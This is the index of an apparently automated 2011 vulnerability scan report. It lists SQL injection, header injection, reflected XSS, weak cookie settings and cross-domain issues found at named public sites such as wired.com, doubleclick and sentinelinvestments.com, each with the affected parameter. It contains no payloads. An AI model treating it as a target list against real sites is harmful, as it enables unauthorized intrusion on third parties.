DORK Search, Exploit Research, Vulnerability Reports

DORK Daily Report for January 13, 2011 | Vulnerability Crawler Information

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Thu Jan 13 10:08:59 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [name of an arbitrarily supplied request parameter]

1.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 3]

1.3. http://www.sentinelinvestments.com/forms_literature.php [name of an arbitrarily supplied request parameter]

1.4. http://www.sentinelinvestments.com/index.php [name of an arbitrarily supplied request parameter]

1.5. http://www.sentinelinvestments.com/sentinel_news_detail.php [name of an arbitrarily supplied request parameter]

1.6. http://www.websitedescription.com/msn.whitepages.com [REST URL parameter 1]

1.7. http://www.websitedescription.com/msn.whitepages.com [name of an arbitrarily supplied request parameter]

1.8. http://www.wired.com/user/login [name of an arbitrarily supplied request parameter]

1.9. http://www.wired.com/video/ [name of an arbitrarily supplied request parameter]

2. HTTP header injection

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

2.2. http://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]

2.3. http://ad.doubleclick.net/activity [src parameter]

2.4. http://ad.doubleclick.net/ad/wiredcom.dart/threatlevel [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [REST URL parameter 1]

2.6. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel [REST URL parameter 1]

2.7. http://ad.uk.doubleclick.net/ad/reg.misc.4159/textlink [REST URL parameter 1]

2.8. http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink [REST URL parameter 1]

2.9. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 1]

2.10. http://ad.uk.doubleclick.net/imp [REST URL parameter 1]

2.11. http://ad.uk.doubleclick.net/jump/reg.misc.4159/textlink [REST URL parameter 1]

2.12. http://ad.uk.doubleclick.net/jump/reg.security.4159/front [REST URL parameter 1]

2.13. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

2.14. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

2.15. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

2.16. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]

2.17. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]

2.18. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]

2.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.20. http://download.cnet.com/8737-1_1-0.xml [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://ad.insightexpressai.com/adserver/adServer.aspx [name of an arbitrarily supplied request parameter]

3.2. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

3.3. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

3.4. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

3.5. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

3.6. http://digg.com/submit [REST URL parameter 1]

3.7. http://flowplayer.org/tools/ [REST URL parameter 1]

3.8. http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1]

3.9. http://mads.cnet.com/mac-ad [name of an arbitrarily supplied request parameter]

3.10. http://weeklyad.target.com/target/default.aspx [name of an arbitrarily supplied request parameter]

3.11. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.12. http://www.addthis.com/bookmark.php [REST URL parameter 1]

3.13. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

3.14. http://www.ccmaine.net/AboutUs [REST URL parameter 1]

3.15. http://www.ccmaine.net/AboutUs [REST URL parameter 1]

3.16. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]

3.17. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]

3.18. http://www.ccmaine.net/ContactUs [REST URL parameter 1]

3.19. http://www.ccmaine.net/ContactUs [REST URL parameter 1]

3.20. http://www.ccmaine.net/HomePage [REST URL parameter 1]

3.21. http://www.ccmaine.net/HomePage [REST URL parameter 1]

3.22. http://www.ccmaine.net/ServiceArea [REST URL parameter 1]

3.23. http://www.ccmaine.net/ServiceArea [REST URL parameter 1]

3.24. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]

3.25. http://www.ccmaine.net/ServiceOfferings [REST URL parameter 1]

3.26. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]

3.27. http://www.ccmaine.net/TechnicalSupport [REST URL parameter 1]

3.28. http://www.ccmaine.net/a [REST URL parameter 1]

3.29. http://www.ccmaine.net/a [REST URL parameter 1]

3.30. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure [REST URL parameter 5]

3.31. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest [REST URL parameter 5]

3.32. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite [REST URL parameter 5]

3.33. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides [REST URL parameter 5]

3.34. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio [REST URL parameter 5]

3.35. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler [REST URL parameter 5]

3.36. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details [REST URL parameter 5]

3.37. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride [REST URL parameter 5]

3.38. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ [REST URL parameter 5]

3.39. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour [REST URL parameter 5]

3.40. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest [REST URL parameter 5]

3.41. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld [REST URL parameter 5]

3.42. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky [REST URL parameter 5]

3.43. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride [REST URL parameter 5]

3.44. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker [REST URL parameter 5]

3.45. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self [REST URL parameter 5]

3.46. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue [REST URL parameter 5]

3.47. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair [REST URL parameter 5]

3.48. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue [REST URL parameter 5]

3.49. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W [REST URL parameter 5]

3.50. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired [REST URL parameter 5]

3.51. http://www.tukui.org/v2/blog/ [name of an arbitrarily supplied request parameter]

3.52. http://www.tukui.org/v2/category/others/ [name of an arbitrarily supplied request parameter]

3.53. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1]

3.54. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2]

3.55. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3]

3.56. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]

3.57. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]

3.58. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]

3.59. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]

3.60. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]

3.61. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]

3.62. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5]

3.63. http://www.wired.com/user/login [REST URL parameter 1]

3.64. http://www.wired.com/user/login [REST URL parameter 2]

3.65. http://www.wired.com/user/logout [REST URL parameter 1]

3.66. http://www.wired.com/user/logout [REST URL parameter 2]

3.67. http://www.wired.com/user/registration [REST URL parameter 1]

3.68. http://www.wired.com/user/registration [REST URL parameter 2]

3.69. http://www.wired.com/video/ [REST URL parameter 1]

3.70. http://www.wired.com/video/search/ [REST URL parameter 1]

3.71. http://www.wired.com/video/search/ [REST URL parameter 2]

3.72. http://www.wired.com/video/search/ [REST URL parameter 2]

3.73. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.74. http://www.addthis.com/bookmark.php [Referer HTTP header]

3.75. http://www.cbsinteractive.com/adfeedback/ [Referer HTTP header]

3.76. http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml [Referer HTTP header]

3.77. http://www.zdnet.com/ [Referer HTTP header]

3.78. http://www.zdnet.com/ [Referer HTTP header]

3.79. http://www.zdnet.com/ [Referer HTTP header]

4. Flash cross-domain policy

4.1. http://ad.crwdcntrl.net/crossdomain.xml

4.2. http://ad.doubleclick.net/crossdomain.xml

4.3. http://ad.uk.doubleclick.net/crossdomain.xml

4.4. http://b.scorecardresearch.com/crossdomain.xml

4.5. http://bs.serving-sys.com/crossdomain.xml

4.6. http://ad.wsod.com/crossdomain.xml

4.7. http://adlog.com.com/crossdomain.xml

4.8. http://www.walmart.com/crossdomain.xml

4.9. http://www.washingtonpost.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://account.theregister.co.uk/register/

6.2. http://digg.com/submit

6.3. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

6.4. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

6.5. http://lists.arin.net/mailman/listinfo/arin-whoisrws

6.6. http://whitepapers.theregister.co.uk/

6.7. http://whitepapers.theregister.co.uk/search/

6.8. http://www.43things.com/person/

6.9. http://www.sentinelinvestments.com/advisor-login

6.10. http://www.tukaiz.com/index.php

7. XML injection

8. SSL cookie without secure flag set

8.1. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure

8.2. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

8.3. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite

8.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides

8.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

8.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

8.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details

8.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride

8.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ

8.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour

8.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest

8.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld

8.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky

8.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride

8.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker

8.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self

8.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue

8.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair

8.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue

8.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W

8.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired

9. Password field submitted using GET method

10. Cookie scoped to parent domain

10.1. http://www.43things.com/person/

10.2. http://www.admob.com/

10.3. http://www.walmart.com/x22

10.4. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

10.5. http://ad.doubleclick.net/activity

10.6. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel

10.7. http://ad.doubleclick.net/clk

10.8. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel

10.9. http://ad.insightexpressai.com/adserver/adServer.aspx

10.10. http://b.scorecardresearch.com/b

10.11. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

10.12. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

10.13. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

10.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.15. http://download.cnet.com/1770-20_4-0.html

10.16. http://download.cnet.com/8300-2007_4-12.xml

10.17. http://download.cnet.com/8301-2007_4-20015771-12.html

10.18. http://download.cnet.com/8301-2007_4-20027809-12.html

10.19. http://download.cnet.com/8301-2007_4-20027809-12.html--

10.20. http://download.cnet.com/8301-2007_4-20027865-12.html

10.21. http://download.cnet.com/download-blog/

10.22. http://download.cnet.com/mac/

10.23. http://download.cnet.com/mobile-downloads/

10.24. http://download.cnet.com/webware-apps/

10.25. http://download.cnet.com/windows/

10.26. http://landesm.gfi.com/event-log-analysis-sm/

10.27. http://www.zdnet.com/

11. Cookie without HttpOnly flag set

11.1. http://weeklyad.target.com/target/default.aspx

11.2. http://www.43things.com/person/

11.3. http://www.admob.com/

11.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure

11.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

11.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite

11.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides

11.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

11.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

11.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details

11.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride

11.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ

11.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour

11.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest

11.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld

11.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky

11.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride

11.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker

11.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self

11.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue

11.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair

11.22. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue

11.23. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W

11.24. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired

11.25. http://www.sentinelinvestments.com/

11.26. http://www.tukui.org/v2/forums/register.php

11.27. http://www.walmart.com/x22

11.28. http://www.wired.com/services/corrections/

11.29. http://www.wired.com/services/newsletters

11.30. http://www.wired.com/user/login

11.31. http://www.wired.com/user/logout

11.32. http://www.wired.com/user/registration

11.33. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

11.34. http://ad.doubleclick.net/activity

11.35. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel

11.36. http://ad.doubleclick.net/clk

11.37. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel

11.38. http://ad.insightexpressai.com/adserver/adServer.aspx

11.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317

11.40. http://b.scorecardresearch.com/b

11.41. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

11.42. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

11.43. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

11.44. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

11.45. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

11.46. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

11.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.48. http://digg.com/submit

11.49. http://download.cnet.com/1770-20_4-0.html

11.50. http://download.cnet.com/8300-2007_4-12.xml

11.51. http://download.cnet.com/8301-2007_4-20015771-12.html

11.52. http://download.cnet.com/8301-2007_4-20027809-12.html

11.53. http://download.cnet.com/8301-2007_4-20027809-12.html--

11.54. http://download.cnet.com/8301-2007_4-20027865-12.html

11.55. http://download.cnet.com/download-blog/

11.56. http://download.cnet.com/mac/

11.57. http://download.cnet.com/mobile-downloads/

11.58. http://download.cnet.com/webware-apps/

11.59. http://download.cnet.com/windows/

11.60. http://landesm.gfi.com/event-log-analysis-sm/

11.61. http://www.addthis.com/bookmark.php

11.62. http://www.ccmaine.net/

11.63. http://www.zdnet.com/

12. Password field with autocomplete enabled

12.1. http://account.theregister.co.uk/register/

12.2. http://darkblue.com/index.htm

12.3. http://darkblue.com/index.htm

12.4. http://digg.com/submit

12.5. https://edit.yahoo.com/registration

12.6. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

12.7. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

12.8. http://lists.arin.net/mailman/listinfo/arin-whoisrws

12.9. http://whitepapers.theregister.co.uk/

12.10. http://whitepapers.theregister.co.uk/search/

12.11. http://www.43things.com/person/

12.12. http://www.admob.com/

12.13. http://www.connect.facebook.com/widgets/fan.php

12.14. http://www.sentinelinvestments.com/advisor-login

12.15. http://www.tukaiz.com/index.php

13. Source code disclosure

13.1. http://www.addthis.com/bookmark.php

13.2. http://www.websitedescription.com/msn.whitepages.com

13.3. http://www.wired.com/magazine/

13.4. http://www.wired.com/magazine/ipad

13.5. http://www.wired.com/playbook/

14. Referer-dependent response

15. Cross-domain Referer leakage

15.1. http://account.theregister.co.uk/register/

15.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front

15.3. https://edit.yahoo.com/registration

15.4. http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml

15.5. http://www.wired.com/js/global.js

16. Cross-domain script include

16.1. http://dean.edwards.name/weblog/2006/03/base/

16.2. http://digg.com/submit

16.3. http://download.cnet.com/1770-20_4-0.html

16.4. http://download.cnet.com/3474-4_4-0.html

16.5. http://download.cnet.com/8301-2007_4-20015771-12.html

16.6. http://download.cnet.com/8301-2007_4-20027809-12.html

16.7. http://download.cnet.com/8301-2007_4-20027809-12.html--

16.8. http://download.cnet.com/8301-2007_4-20027809-12.html/

16.9. http://download.cnet.com/8301-2007_4-20027865-12.html

16.10. http://download.cnet.com/8618-2007_4-20027809.html

16.11. http://download.cnet.com/download-blog/

16.12. http://download.cnet.com/mac/

16.13. http://download.cnet.com/mobile-downloads/

16.14. http://download.cnet.com/webware-apps/

16.15. http://download.cnet.com/windows/

16.16. http://flowplayer.org/tools/

16.17. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

16.18. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/

16.19. http://landesm.gfi.com/event-log-analysis-sm/

16.20. http://www.addthis.com/bookmark.php

16.21. http://www.admob.com/

16.22. http://www.cbsinteractive.com/adfeedback/

16.23. http://www.connect.facebook.com/widgets/fan.php

16.24. http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml

16.25. http://www.pwc.com/en_GX/webadmin/forms/email_a_colleague.jhtml

16.26. http://www.pwc.com/gx/en/annual-review

16.27. http://www.pwc.com/gx/en/annual-review/facts-figures-2010.jhtml

16.28. http://www.pwc.com/gx/en/index.jhtml

16.29. http://www.pwc.com/us/en/10minutes/cloud-computing.jhtml

16.30. http://www.pwc.com/us/en/index.jhtml

16.31. http://www.pwc.com/us/en/industry/index.jhtml

16.32. http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml

16.33. http://www.pwc.com/us/en/issues/current-issues.jhtml

16.34. http://www.pwc.com/us/en/services/index.jhtml

16.35. http://www.pwc.com/us/en/technology/index.jhtml

16.36. http://www.tukaiz.com/index.php

16.37. http://www.tukui.org/v2/forums/

16.38. http://www.tukui.org/v2/forums/register.php

16.39. http://www.walmart.com/x22

16.40. http://www.websitedescription.com/msn.whitepages.com

16.41. http://www.wired.com/

16.42. http://www.wired.com/about/blogs

16.43. http://www.wired.com/about/faq/

16.44. http://www.wired.com/about/feedback/

16.45. http://www.wired.com/about/mobile/

16.46. http://www.wired.com/about/press/

16.47. http://www.wired.com/about/privacy-policy/

16.48. http://www.wired.com/about/rss_feeds/

16.49. http://www.wired.com/about/sitemap/

16.50. http://www.wired.com/about/staff_web/

16.51. http://www.wired.com/about/user-agreement/

16.52. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_A

16.53. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_blogs_rightRail_subServices

16.54. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_header

16.55. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_contentPage_headerCallout

16.56. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar

16.57. http://www.wired.com/atg/registry/RepositoryTargeters/WIR/WIR_global_navBar_rollover

16.58. http://www.wired.com/autopia/

16.59. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

16.60. http://www.wired.com/blogs/

16.61. http://www.wired.com/cars/

16.62. http://www.wired.com/culture/

16.63. http://www.wired.com/dangerroom/

16.64. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

16.65. http://www.wired.com/entertainment/

16.66. http://www.wired.com/epicenter/

16.67. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

16.68. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/

16.69. http://www.wired.com/gadgetlab/

16.70. http://www.wired.com/gadgets/

16.71. http://www.wired.com/gamelife/

16.72. http://www.wired.com/gaming/

16.73. http://www.wired.com/geekdad/

16.74. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

16.75. http://www.wired.com/inspiredbyyou/

16.76. http://www.wired.com/js/global.js

16.77. http://www.wired.com/magazine/

16.78. http://www.wired.com/magazine/decode/

16.79. http://www.wired.com/magazine/ipad

16.80. http://www.wired.com/medtech/

16.81. http://www.wired.com/nolayout/rssproxy

16.82. http://www.wired.com/playbook/

16.83. http://www.wired.com/politics/

16.84. http://www.wired.com/rawfile/

16.85. http://www.wired.com/reviews/

16.86. http://www.wired.com/reviews/%20

16.87. http://www.wired.com/reviews/category/automotive/

16.88. http://www.wired.com/reviews/category/desktops-and-accessories/

16.89. http://www.wired.com/reviews/category/digital-cameras-and-camcorders/

16.90. http://www.wired.com/reviews/category/gaming-gear/

16.91. http://www.wired.com/reviews/category/home-audio-and-video/

16.92. http://www.wired.com/reviews/category/household/

16.93. http://www.wired.com/reviews/category/media-players/

16.94. http://www.wired.com/reviews/category/mobile-audio/

16.95. http://www.wired.com/reviews/category/mobile-phones/

16.96. http://www.wired.com/reviews/category/notebooks-and-accessories/

16.97. http://www.wired.com/reviews/category/roundups/

16.98. http://www.wired.com/reviews/category/software-and-apps/

16.99. http://www.wired.com/reviews/category/sports-and-outdoors/

16.100. http://www.wired.com/reviews/category/tablets-and-ebook-readers/

16.101. http://www.wired.com/reviews/category/televisions/

16.102. http://www.wired.com/science/

16.103. http://www.wired.com/search

16.104. http://www.wired.com/services/corrections/

16.105. http://www.wired.com/services/newsletters

16.106. http://www.wired.com/software/

16.107. http://www.wired.com/techbiz/

16.108. http://www.wired.com/thisdayintech/

16.109. http://www.wired.com/threatlevel/

16.110. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/

16.111. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/

16.112. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/

16.113. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

16.114. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/

16.115. http://www.wired.com/threatlevel/2011/01/codebreakers-death/

16.116. http://www.wired.com/threatlevel/2011/01/dubai-assassination/

16.117. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/

16.118. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/

16.119. http://www.wired.com/threatlevel/2011/01/video-poker/

16.120. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/

16.121. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

16.122. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

16.123. http://www.wired.com/threatlevel/author/kimzetter/

16.124. http://www.wired.com/threatlevel/category/announcements/

16.125. http://www.wired.com/threatlevel/category/atm-hacking/

16.126. http://www.wired.com/threatlevel/category/bittorrent/

16.127. http://www.wired.com/threatlevel/category/black-hat-conference/

16.128. http://www.wired.com/threatlevel/category/bradley-manning/

16.129. http://www.wired.com/threatlevel/category/breaches/

16.130. http://www.wired.com/threatlevel/category/censorship/

16.131. http://www.wired.com/threatlevel/category/chaos-computer-club/

16.132. http://www.wired.com/threatlevel/category/conferences/

16.133. http://www.wired.com/threatlevel/category/copyrights-and-patents/

16.134. http://www.wired.com/threatlevel/category/coverups/

16.135. http://www.wired.com/threatlevel/category/crime/

16.136. http://www.wired.com/threatlevel/category/crypto/

16.137. http://www.wired.com/threatlevel/category/cybarmageddon/

16.138. http://www.wired.com/threatlevel/category/cyber-warfare/

16.139. http://www.wired.com/threatlevel/category/cyberbullying/

16.140. http://www.wired.com/threatlevel/category/cybersecurity/

16.141. http://www.wired.com/threatlevel/category/defcon/

16.142. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/

16.143. http://www.wired.com/threatlevel/category/e-voting/

16.144. http://www.wired.com/threatlevel/category/elections/

16.145. http://www.wired.com/threatlevel/category/fed-blotter/

16.146. http://www.wired.com/threatlevel/category/glitches-and-bugs/

16.147. http://www.wired.com/threatlevel/category/hacks-and-cracks/

16.148. http://www.wired.com/threatlevel/category/hans-reiser-trial/

16.149. http://www.wired.com/threatlevel/category/identification/

16.150. http://www.wired.com/threatlevel/category/intellectual-property/

16.151. http://www.wired.com/threatlevel/category/lori-drew-trial/

16.152. http://www.wired.com/threatlevel/category/network-neutrality/

16.153. http://www.wired.com/threatlevel/category/nsa/

16.154. http://www.wired.com/threatlevel/category/openleaks/

16.155. http://www.wired.com/threatlevel/category/politics/

16.156. http://www.wired.com/threatlevel/category/porn/

16.157. http://www.wired.com/threatlevel/category/privacy/

16.158. http://www.wired.com/threatlevel/category/rfid/

16.159. http://www.wired.com/threatlevel/category/riaa-litigation/

16.160. http://www.wired.com/threatlevel/category/rsa-conference/

16.161. http://www.wired.com/threatlevel/category/sexting/

16.162. http://www.wired.com/threatlevel/category/spooks-gone-wild/

16.163. http://www.wired.com/threatlevel/category/stuxnet/

16.164. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/

16.165. http://www.wired.com/threatlevel/category/surveillance/

16.166. http://www.wired.com/threatlevel/category/the-courts/

